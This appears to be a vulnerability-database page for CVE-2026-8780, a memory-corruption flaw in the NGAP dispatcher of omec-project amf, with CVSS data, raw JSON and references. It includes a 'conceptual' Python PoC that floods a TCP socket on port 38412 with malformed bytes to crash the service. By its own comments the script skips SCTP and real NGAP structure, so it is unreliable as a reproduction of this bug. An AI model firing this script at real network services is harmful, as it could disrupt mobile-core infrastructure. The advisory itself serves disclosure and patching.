Security Vulnerability Report
CVE-2026-8780 CVSS 4.3 MEDIUM

CVE-2026-8780

Published: 2026-05-18 02:16:37
Last Modified: 2026-05-18 02:16:37

Description

A vulnerability was identified in omec-project amf up to 2.1.3-dev. The affected element is an unknown function of the file ngap/dispatcher.go of the component NGAP Message Handler. The manipulation leads to memory corruption. The attack may be initiated remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.0 is sufficient to fix this issue. It is suggested to upgrade the affected component. The same pull request fixes multiple security issues.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

omec-project amf <= 2.1.3-dev

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import struct

# Conceptual PoC for CVE-2026-8780
# This script attempts to trigger memory corruption by sending malformed data
# to the NGAP dispatcher service.

def send_exploit(target_ip, target_port):
    s = None  # defined up front so the finally block is safe if socket creation fails
    try:
        # Establish a connection to the target service
        # NGAP typically runs over SCTP, but for PoC demonstration we assume TCP or raw socket
        print(f"[+] Connecting to {target_ip}:{target_port}")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))

        # Construct a malformed payload designed to trigger the dispatcher issue
        # In a real scenario, this would be a specific NGAP message structure
        malformed_header = struct.pack('!H', 0x0001)  # Fake length
        malicious_payload = b"\x41" * 1000 + b"\x00" * 50  # Padding to cause overflow/corruption
        payload = malformed_header + malicious_payload

        print("[+] Sending malicious payload...")
        s.send(payload)

        # Receive response (or lack thereof indicating a crash)
        response = s.recv(1024)
        print(f"[+] Received response: {response}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")
    finally:
        if s is not None:
            s.close()

if __name__ == "__main__":
    # Replace with actual target IP and Port
    TARGET_IP = "127.0.0.1"
    TARGET_PORT = 38412  # Common NGAP port (SCTP), used here for TCP concept
    send_exploit(TARGET_IP, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8780", "sourceIdentifier": "[email protected]", "published": "2026-05-18T02:16:37.383", "lastModified": "2026-05-18T02:16:37.383", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in omec-project amf up to 2.1.3-dev. The affected element is an unknown function of the file ngap/dispatcher.go of the component NGAP Message Handler. The manipulation leads to memory corruption. The attack may be initiated remotely. The exploit is publicly available and might be used. Upgrading to version 2.2.0 is sufficient to fix this issue. It is suggested to upgrade the affected component. The same pull request fixes multiple security issues."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://github.com/omec-project/amf/", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/issues/670", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/pull/666", "source": "[email protected]"}, {"url": "https://github.com/omec-project/amf/releases/tag/v2.2.0", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/811617", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/364404", "source": "[email protected]"}, {"url": 
"https://vuldb.com/vuln/364404/cti", "source": "[email protected]"}]}}